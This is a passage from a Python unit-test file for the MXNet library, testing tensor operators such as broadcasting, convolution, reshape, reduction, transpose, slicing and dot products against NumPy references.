check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bor(a, b):
c = mx.sym.broadcast_logical_or(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_or(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_or)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bxor(a, b):
c = mx.sym.broadcast_logical_xor(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_xor(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_xor)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bequal(a, b)
test_bmax(a, b)
test_bmin(a, b)
test_band(a, b)
test_bor(a, b)
test_bxor(a, b)
def test_run_convolution_dilated_impulse_response(dil=(1,1), kernel_shape=(3,3), verbose=False):
dim = len(dil)
assert(len(kernel_shape) == dim)
# Input for spike response
data_size = 33
data_shape = (1, 1) + (data_size,) * dim
center = (0,0) + (data_size // 2,) * dim
spike_imgs = np.zeros(shape=data_shape, dtype=np.float32)
spike_imgs[center] = 1.0
spike_img = mx.nd.array(spike_imgs)
spike_img2 = mx.nd.array(spike_imgs)
kernel_weights = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel_weights2 = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel = mx.symbol.Variable('kernel')
in_img = mx.symbol.Variable('input')
net = mx.symbol.Convolution(in_img, num_filter=1,kernel=kernel_shape, dilate=dil, no_bias="true", name='test_convolution')
net.list_arguments()
be = net._bind(default_context(), args={ 'input' : spike_img, 'test_convolution_weight' : kernel_weights},
args_grad={'input' : spike_img2, 'test_convolution_weight' : kernel_weights2 } )
be.forward(True)
out_o = be.outputs[0].asnumpy()
ndo = be.outputs[0]
out_grads = np.zeros(shape=be.outputs[0].shape, dtype=np.float32)
out_grads[center] = 1.0
out_grad = mx.nd.array(out_grads)
be.backward([out_grad])
vgrad = be.grad_arrays[0].asnumpy()
out = out_o.reshape(out_o.shape[2:])
nz_loc = np.nonzero(out)
assert_allclose(np.sum(out),np.prod(kernel_shape),atol=1e-5)
assert_allclose(np.sum(vgrad),np.prod(kernel_shape),atol=1e-5)
# Now check whether the input gradient was computed correctly
input_grad = mx.nd.array(vgrad)
be = net._bind(default_context(), args={ 'input' : input_grad, 'test_convolution_weight' : kernel_weights})
be.forward(True)
out_o = be.outputs[0].asnumpy()
assert_allclose(out_o[center],np.prod(kernel_shape),atol=1e-5)
rnd_kernel_s = np.random.uniform(low=0.0, high=1.0, size=tuple([1,1]+list(kernel_shape))).astype(np.float32)
impulse_error = mx.nd.array(out_o/np.sum(out_o)) # This should be 1.0 at [0,0,16,16]
rnd_kernel = mx.nd.array(rnd_kernel_s)
rnd_kernel2 = mx.nd.array(rnd_kernel_s)
white_in = mx.nd.ones(shape=data_shape)
white_in2 = mx.nd.ones(shape=data_shape)
be = net._bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : rnd_kernel},
args_grad={'input' : white_in2, 'test_convolution_weight' : rnd_kernel2 } )
be.forward(True)
be.backward([impulse_error])
out_orig = be.outputs[0].asnumpy()
kernel_gradient = be.grad_arrays[1].asnumpy()
dkernel = mx.nd.array(rnd_kernel_s + kernel_gradient)
be = net._bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : dkernel})
be.forward(True)
out = be.outputs[0].asnumpy()
# Now do a simple check of the kernel gradient
assert(out[center] - np.sum(kernel_gradient) - out_orig[center] < 0.001)
def test_convolution_dilated_impulse_response():
# 1D
for dil in [ (1,), (2,), (3,) ]:
for ks in [ (1,), (2,), (3,), (4,)]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 2D
for dil in [ (1,1), (2,2), (3,3) ]:
for ks in [ (3,3), (4,4), (2,3), (3,2), (1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 3D
for dil in [ (1,1,1), (2,2,2), (3,3,3) ]:
for ks in [ (3,3,3), (4,4,4), (2,3,4), (3,2,4), (1,1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
@pytest.mark.serial
@pytest.mark.parametrize('src_shape,shape_args,reverse,dst_shape', [
((2, 3, 5, 5), (0, -1), False, (2, 75)),
((2, 3, 5, 5), (0, 0, -1), False, (2, 3, 25)),
((5, 3, 4, 5), (0, -1, 0), False, (5, 15, 4)),
((2, 3, 5, 4), (-1, 0, 0), False, (8, 3, 5)),
((2, 3, 5, 5), (0, 0, 0, 0), False, (2, 3, 5, 5)),
((2, 4, 5, 3), (-1, 2, 2, 1), False, (30, 2, 2, 1)),
((2, 3, 5, 6), (-2,), False, (2, 3, 5, 6)),
((2, 3, 5, 6), (6, 1, -2), False, (6, 1, 5, 6)),
((2, 3, 5, 6), (-3, -3), False, (6, 30)),
((2, 3, 5, 6), (-3, -1), False, (6, 30)),
((64,), (-4, 16, 4), False, (16, 4)),
((64,), (-4, 16, -1), False, (16, 4)),
((64, 1, 2, 3), (-4, 16, -1, -2), False, (16, 4, 1, 2, 3)),
((2, 3, 5, 5), (0, -1), True, (5, 30)),
((2, 3, 5, 5), (0, 0, -1), True, (3, 5, 10)),
((5, 3, 4, 5), (0, -1, 0), True, (3, 20, 5)),
((2, 3, 5, 4), (-1, 0, 0), True, (6, 5, 4)),
((2, 3, 4, 5), (3, -1, 0), True, (3, 8, 5)),
((2, 3, 5, 5), (5, 3, 0, -1), True, (5, 3, 5, 2)),
((2, 3, 5, 5), (0, 0, 0, 0), True, (2, 3, 5, 5)),
((2, 3, 5, 6), (-2,), True, (2, 3, 5, 6)),
((2, 3, 5, 6), (-2, 1, 30), True, (2, 3, 1, 30)),
((2, 3, 5, 6), (-3, -3), True, (6, 30)),
((64,), (16, 4, -4), True, (16, 4)),
((64,), (16, -1, -4), True, (16, 4)),
((1, 2, 3, 64), (-2, -1, 16, -4), True, (1, 2, 3, 4, 16))
])
def test_reshape_new(src_shape, shape_args, reverse, dst_shape):
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, shape=shape_args, reverse=reverse)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=src_shape)
assert output_shape[0] == dst_shape, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
dat_npy = np.random.rand(*src_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net._simple_bind(default_context(), data=src_shape)
exe.arg_dict['data'][:] = dat_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - dat_npy.reshape(dst_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['data'].asnumpy() - grad_npy.reshape(src_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
for i in range(len(src_shape)):
holdout_src_shape = list(src_shape)
holdout_src_shape[i] = 0
holdout_src_shape = tuple(holdout_src_shape)
net = mx.sym.Variable('data')
net = mx.sym.elemwise_add(net.reshape(shape_args, reverse=reverse), mx.sym.ones(shape=dst_shape))
input_shape, output_shape, __ = net.infer_shape(data=holdout_src_shape)
assert output_shape[0] == dst_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
assert input_shape[0] == src_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
def test_reshape_old():
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, target_shape=(2, 0))
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=(2, 3, 5, 5))
assert(output_shape[0] == (2, 75))
# Test for Flatten
data = mx.sym.Variable("data")
net = mx.sym.Flatten(data)
exe = net._simple_bind(ctx=default_context(), data=(5, 4, 3, 7))
data_npy = np.random.normal(size=(5, 4, 3, 7))
out_grad_npy = np.random.normal(size=(5, 4 * 3 * 7))
outputs = exe.forward(is_train=True, data=data_npy)[0].asnumpy()
assert_allclose(outputs, data_npy.reshape((5, 4 * 3 * 7)))
exe.backward(out_grads=[mx.nd.array(out_grad_npy, ctx=default_context())])
assert_allclose(exe.grad_arrays[0].asnumpy(), out_grad_npy.reshape((5, 4, 3, 7)))
def test_reshape_like():
def test_reshape_like_new(lhs_shape, rhs_shape, lbeg, lend, rbeg, rend, dst_shape):
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs, lhs_begin=lbeg, lhs_end=lend, rhs_begin=rbeg, rhs_end=rend)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=lhs_shape, rhs=rhs_shape)
assert output_shape[0] == dst_shape, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
lhs_npy = np.random.rand(*lhs_shape)
rhs_npy = np.random.rand(*rhs_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net._simple_bind(default_context(), lhs=lhs_shape, rhs=rhs_shape)
exe.arg_dict['lhs'][:] = lhs_npy
exe.arg_dict['rhs'][:] = rhs_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - lhs_npy.reshape(dst_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['lhs'].asnumpy() - grad_npy.reshape(lhs_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
# Test new api (Using shape)
test_cases = [
[(30,), (15,2,4), 0, None, 0, 2, (15,2)],
[(30,), (15,2,4), None, 1, None, 2, (15,2)],
[(30,7), (15,2,4), 0, 1, 0, 2, (15,2,7)],
[(3,5), (1,15,4), 0, 2, 1, 2, (15,)],
[(3,5), (1,15,4), 0, None, 1, -1, (15,)],
[(30,12), (4,2,2,3), -1, None, 1, None, (30,2,2,3)],
[(1,1,7,3,1,1), (81,1,1,21), 1, -1, 1, None, (1,1,1,21,1)]
]
# for test_case in test_cases:
for test_case in test_cases:
test_reshape_like_new(*test_case)
# Test old api
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=(40, 30), rhs=(30,20,2))
assert(output_shape[0] == (30,20,2))
def test_reduce():
sample_num = 500
def test_reduce_inner(numpy_reduce_func, numpy_reduce_grad_func, mx_reduce_sym, nan_prob=0,
test_exclude=True, test_none_axis=False):
for i in range(sample_num):
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
# Insert a NaN with probability equal to nan_prob
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
axis_num = np.random.randint(0, ndim, size=1)
axis_flags = np.random.randint(0, 2, size=ndim)
if test_exclude:
exclude = np.random.randint(0, 2)
else:
exclude = False
axes = []
for (axis, flag) in enumerate(axis_flags):
if flag:
axes.append(axis)
if 0 == len(axes):
axes = None
elif 1 == len(axes):
axes = axes[0]
else:
axes = tuple(axes)
keepdims = np.random.randint(0, 2)
a = mx.symbol.Variable('a')
if axes is None:
if test_none_axis:
b = mx_reduce_sym(a, keepdims=keepdims, axis=axes)
else:
b = mx_reduce_sym(a, keepdims=keepdims)
elif exclude and isinstance(axes, tuple) and len(axes) < ndim:
naxes = [i for i in range(ndim) if i not in axes]
b = mx_reduce_sym(a, axis=naxes, keepdims=keepdims, exclude=True)
else:
b = mx_reduce_sym(a, axis=axes, keepdims=keepdims)
dat_npy = np.random.rand(*shape)
# Test with both negative and positive values (randomly). Avoid having both in the same
# test, which can be problematic for error checking due to near-zero values.
if np.random.rand() > 0.5:
dat_npy = -dat_npy
if nan_prob > 0:
dat_npy[np.random.rand(*shape) < nan_prob] = np.nan
sum_groundtruth = np.array(numpy_reduce_func(dat_npy, axis=axes, keepdims=keepdims))
if sum_groundtruth.shape == ():
sum_groundtruth = np.array([sum_groundtruth])
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.array(np.random.rand(*sum_groundtruth.shape))
keepdim_shape = np_reduce(dat_npy, axes, 1, np.sum).shape
grad_groundtruth = numpy_reduce_grad_func(outgrad=outgrad_npy, data=dat_npy,
outdata=sum_groundtruth,
axis=axes, keepdims=keepdims,
keepdim_shape=keepdim_shape)
net = b._bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
# check forward
assert_almost_equal_ignore_nan(net.outputs[0].asnumpy(), sum_groundtruth, rtol=1e-4, atol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
bc_grad_groundtruth = np.broadcast_to(grad_groundtruth, grad_nd.shape)
# check backward
assert_almost_equal_ignore_nan(grad_nd.asnumpy(), bc_grad_groundtruth, rtol=1e-4, atol=1e-4)
test_none_axis = [True, False]
for test_none in test_none_axis:
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.sum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape),
mx.symbol.sum, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.mean),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape)/(data.size/outdata.size),
mx.symbol.mean, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.prod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (outdata.reshape(keepdim_shape) / data),
mx.symbol.prod, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nansum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape)),
mx.symbol.nansum, 0.3, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nanprod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape) *
(outdata.reshape(keepdim_shape) / data)),
mx.symbol.nanprod, 0.3, test_none_axis=test_none)
# grad of max and min are sensitive to the precision of the calculation.
# Force numpy to match mxnet's float32.
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.max),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.max)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.min),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.min)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.linalg.norm),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (data / outdata.reshape(keepdim_shape)),
mx.symbol.norm, test_exclude=False, test_none_axis=test_none)
def test_broadcast():
sample_num = 200
for i in range(sample_num):
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
target_shape = np.random.randint(1, 6, size=(ndim,))
axis = tuple(set(np.random.randint(0, ndim, np.random.randint(1, ndim + 1))))
shape = target_shape.copy()
size = tuple([shape[ele] for ele in axis])
for ele in axis:
shape[ele] = 1
target_shape_with_zero = list(target_shape)
for idx in range(len(target_shape_with_zero)):
if idx not in axis:
target_shape_with_zero[idx] = 0
break
a = mx.symbol.Variable('a')
sym_bcast_axis = mx.symbol.broadcast_axis(a, axis=axis, size=size)
sym_bcast_to = mx.symbol.broadcast_to(a, shape=tuple(target_shape))
sym_bcast_to_with_zero = mx.symbol.broadcast_to(a, shape=tuple(target_shape_with_zero))
sym_bcast_like = mx.symbol.broadcast_like(a, sym_bcast_to)
def test_broadcasting_ele(sym_bcast):
dat_npy = np.random.rand(*shape)
groundtruth = dat_npy
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.random.rand(*target_shape)
grad_groundtruth = np_reduce(outgrad_npy, axis=axis, keepdims=True,
numpy_reduce_func=np.sum)
net = sym_bcast._bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
assert (net.outputs[0].shape == target_shape).all()
assert_almost_equal(net.outputs[0], groundtruth, rtol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
assert_almost_equal(grad_nd, grad_groundtruth, rtol=1e-4)
test_broadcasting_ele(sym_bcast_axis)
test_broadcasting_ele(sym_bcast_to)
test_broadcasting_ele(sym_bcast_to_with_zero)
test_broadcasting_ele(sym_bcast_like)
def test_transpose():
for ndim in range(1, 10):
for t in range(5):
dims = list(np.random.randint(1, 5, size=ndim))
axes = list(range(ndim))
random.shuffle(axes)
axes = tuple(axes)
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@pytest.mark.serial
def test_pseudo2dtranspose():
def getTwoInts(mn, mx):
n1 = np.random.randint(mn, mx)
n2 = np.random.randint(mn, mx-1)
n2 = n2 if n2 < n1 else n2+1
return tuple(np.sort([n1, n2]))
def getTranspAxes(ndim):
axes = list(range(ndim))
n1, n2 = getTwoInts(0,ndim)
return tuple(axes[:n1]+axes[n2:]+axes[n1:n2])
for ndim in range(2, 7):
for dt in ['int8', 'half', 'int32', 'int64']:
for _ in range(5):
dims = list(np.random.randint(5, 20, size=ndim))
axes = getTranspAxes(ndim)
x = mx.nd.array(np.random.normal(size=dims), dtype=dt)
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
@pytest.mark.serial
def test_big_transpose():
n = [1]
d = list(np.random.randint(132, 160, size=1))
hw = list(np.random.randint(256, 320, size=2))
c = [10]
dims = n + d + hw + c
axes = (0,4,1,2,3)
x_np = np.random.normal(size=dims).astype('uint8')
x = mx.nd.array(x_np, dtype='uint8')
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x_np, axes=axes), y.asnumpy().astype('uint8'))
axes = (0,2,3,4,1)
z = mx.nd.transpose(y, axes=axes)
assert_allclose(x_np, z.asnumpy().astype('uint8'))
@pytest.mark.serial
def test_larger_transpose():
x = mx.nd.random.normal(shape=(50,51))
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
def test_expand_dims():
for ndim in range(1, 6):
for axis in range(-ndim + 1, ndim):
x = np.random.normal(size=list(np.random.randint(1, 10, size=ndim)))
y = mx.nd.array(x)
x1 = np.expand_dims(x, axis=axis)
y1 = mx.nd.expand_dims(y, axis=axis)
assert_allclose(x1, y1.asnumpy())
assert_allclose(x1.shape, y1.shape)
def test_crop():
for ndim in range(1, 6):
for t in range(5):
dims = []
begin = []
end = []
idx = []
for i in range(ndim):
d = random.randint(1, 5)
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if b == 0 and random.randint(0, 1):
b = None
elif b != 0 and random.randint(0, 1):
b -= d
if e == d and random.randint(0, 1):
e = None
elif e != d and random.randint(0, 1):
e -= d
dims.append(d)
begin.append(b)
end.append(e)
idx.append(slice(b, e))
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.crop(x, begin=tuple(begin), end=tuple(end))
assert_allclose(x.asnumpy()[idx], y.asnumpy())
vx = mx.sym.Variable('x')
vy = mx.sym.crop(vx, begin=tuple(begin), end=tuple(end))
check_numeric_gradient(vy, [x.asnumpy()])
def test_slice_axis():
for ndim in range(1, 6):
shape = np.random.randint(1, 11, size=(ndim,))
for t in range(ndim):
d = shape[t]
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if np.random.rand() > 0.6:
e = None
else:
if e < d and np.random.rand() > 0.5:
e = e - d
if np.random.rand() > 0.5:
b = b - d
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
idx[t] = slice(b, e)
X = mx.symbol.Variable('X')
x = mx.nd.array(np.random.normal(size=shape))
Y = mx.symbol.slice_axis(data=X, axis=t, begin=b, end=e)
xgrad = mx.nd.empty(x.shape)
exec1 = Y._bind(default_context(), args = [x], args_grad = {'X': xgrad})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
x_grad_npy = np.random.normal(size=x.shape)
xgrad = mx.nd.array(x_grad_npy)
exec2 = Y._bind(default_context(), args=[x], args_grad={'X': xgrad}, grad_req="add")
exec2.forward(is_train=True)
exec2.backward([exec2.outputs[0]])
xx = np.zeros(shape=x.shape, dtype=np.float32)
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx + x_grad_npy, xgrad.asnumpy(), atol=1E-5)
def test_slice_like():
for ndim in range(1, 6):
from_shape = np.random.randint(1, 11, size=(ndim,))
shape = [s + np.random.randint(0, 3) for s in from_shape]
for t in range(ndim):
if t > 0:
axes = np.random.randint(0, ndim, size=t).tolist()
else:
axes = []
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
if i in axes or not axes:
idx[i] = slice(0, from_shape[i])
if axes:
pos = np.random.randint(0, t)
if axes[pos] > 0:
axes[pos] -= ndim # negative index
X = mx.symbol.Variable('X')
X_1 = mx.symbol.Variable('X1')
x = mx.nd.array(np.random.normal(size=shape))
x1 = mx.nd.array(np.random.normal(size=from_shape))
Y = mx.symbol.slice_like(data=X, shape_like=X_1, axes=axes)
xgrad = mx.nd.empty(x.shape)
xgrad1 = mx.nd.empty(x1.shape)
exec1 = Y._bind(default_context(), args = [x, x1],
args_grad = {'X': xgrad, 'X1': xgrad1})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
assert_allclose(xgrad1.asnumpy(), mx.nd.zeros_like(xgrad1).asnumpy())
def test_slice_like_different_types():
x = [[ 1., 2., 3., 4.],
[ 5., 6., 7., 8.],
[ 9., 10., 11., 12.]]
y = [[ 0., 0., 0.],
[ 0., 0., 0.]]
x = mx.nd.array(x)
y = mx.nd.array(y).astype('int32')
z = mx.nd.slice_like(x, y)
assert_allclose(z.asnumpy(), [[1,2,3],[5,6,7]])
def test_reshape_like_different_types():
x = mx.nd.zeros((2, 3))
y = mx.nd.array([[1, 2], [3, 4], [5, 6]])
y = mx.nd.array(y).astype('int32')
z = mx.nd.reshape_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0],[0,0]])
def test_broadcast_like_different_types():
x = mx.nd.zeros((2, 1))
y = mx.nd.ones((2, 2))
y = mx.nd.array(y).astype('int32')
z = mx.nd.broadcast_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0]])
assert x.dtype == z.dtype
def test_flip():
for ndim in range(1, 6):
for t in range(5):
dims = [random.randint(1,10) for i in range(ndim)]
axis = random.randint(0, ndim-1)
idx = [slice(None, None, -1) if i == axis else slice(None, None) for i in range(ndim)]
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.flip(x, axis=axis)
assert_allclose(x.asnumpy()[idx], y.asnumpy())
def test_stn():
import sys
np.set_printoptions(threshold=sys.maxsize)
num_filter = 2 # conv of loc net
kernel = (3, 3) # conv of loc net
num_hidden = 6 # fc of loc net
for n in [1, 2, 3, 4]:
for c in [1, 2, 3, 4]:
for h in [5, 9, 13, 17]: # for convenience test, this third and forth input dim should be 4x + 1
for w in [5, 9, 13, 17]:
data_shape = (n, c, h, w)
target_shape = (int((data_shape[2]+1)/2), int((data_shape[3]+1)/2))
data = mx.sym.Variable(name="data")
loc = mx.sym.Convolution(data=data, kernel=kernel, pad=(1, 1), num_filter=num_filter, name="loc_conv")
loc = mx.sym.Flatten(data=loc)
loc = mx.sym.FullyConnected(data=loc, num_hidden=num_hidden, name="loc_fc")
stn = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=target_shape,
transform_type="affine", sampler_type="bilinear")
arg_names = stn.list_arguments()
arg_shapes, out_shapes, _ = stn.infer_shape(data=data_shape)
# check shape
assert out_shapes[0] == (data_shape[0], data_shape[1], target_shape[0], target_shape[1])
dev = default_context()
#dev = mx.gpu(0)
args = {}
args['data'] = mx.random.normal(0, 1, data_shape, ctx=mx.cpu()).copyto(dev)
args['loc_conv_weight'] = mx.nd.zeros((num_filter, data_shape[1], kernel[0], kernel[1]), ctx=dev)
args['loc_conv_bias'] = mx.nd.zeros((num_filter,), ctx=dev)
args['loc_fc_weight'] = mx.nd.zeros((6, num_filter*data_shape[2]*data_shape[3]), ctx=dev)
args['loc_fc_bias'] = mx.nd.array([0.5, 0, 0, 0, 0.5, 0], ctx=dev)
grad_grad = [mx.nd.zeros(shape, ctx=dev) for shape in arg_shapes]
exe = stn._bind(dev, args=args, args_grad=grad_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
# check forward
assert_almost_equal(out, args['data'].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
out_grad = mx.nd.ones(out.shape, ctx=dev)
exe.backward([out_grad])
# check backward
assert_almost_equal(out_grad, grad_grad[0].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
def test_stn_valid_sampling():
target_shape = (
28,
28,
)
src_shape = (
42,
42,
)
data = mx.sym.Variable(name="data")
loc = mx.sym.Variable(name="loc")
data_array = np.zeros((
1,
1,
) + src_shape)
# Have an ever so slight rotation.
loc_array = np.array(
[[9.03887e-05, 1.00015, 0.00174931, 1.0003, 0.000311901,
-0.000919065]])
stn = mx.sym.SpatialTransformer(
data=data,
loc=loc,
target_shape=target_shape,
transform_type="affine",
sampler_type="bilinear")
grad_req = {k: 'write' for k in stn.list_arguments()}
grads = {
'data': mx.nd.array(np.zeros_like(data_array)),
'loc': mx.nd.array(np.zeros_like(loc_array))
}
executor = stn._bind(
ctx=default_context(),
args={'data': mx.nd.array(data_array),
'loc': mx.nd.array(loc_array)},
grad_req=grad_req,
args_grad=grads)
executor.forward(is_train=True)
executor.backward(mx.nd.ones((
1,
1,
) + target_shape))
def test_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
ndims = [2]
if ctx.device_type == 'gpu':
dtypes += ['float16']
ndims += [1]
# Test normal dot.
for ndim in ndims:
for data_type in dtypes:
tol = 1e-2 if data_type == 'float16' else 1e-3
for m in range(1, 5):
for k in range(1, 5):
if ndim == 1 and k != 1:
pass
for n in range(1, 5):
a_shape = (m, k) if ndim == 2 else (m,)
b_shape = (k, n) if ndim == 2 else (n,)
a_npy = np.random.normal(0, 1, (m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((m, k), dtype=data_type)
bgrad_npy = np.empty((k, n), dtype=data_type)
c_npy[:, :] = np.dot(a_npy[:, :], b_npy[:, :])
bgrad_npy[:, :] = np.dot(a_npy[:, :].T, ograd_npy[:, :])
agrad_npy[:, :] = np.dot(ograd_npy[:, :], b_npy[:, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.dot(a, b)
exe = c._simple_bind(ctx=ctx, a=a_npy.shape, b=b_npy.shape)
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy, rtol=tol, atol=tol)
exe.backward(out_grads=[mx.nd.array(ograd_npy, mx.cpu()).astype(data_type)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy, rtol=tol, atol=tol)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy, rtol=tol, atol=tol)
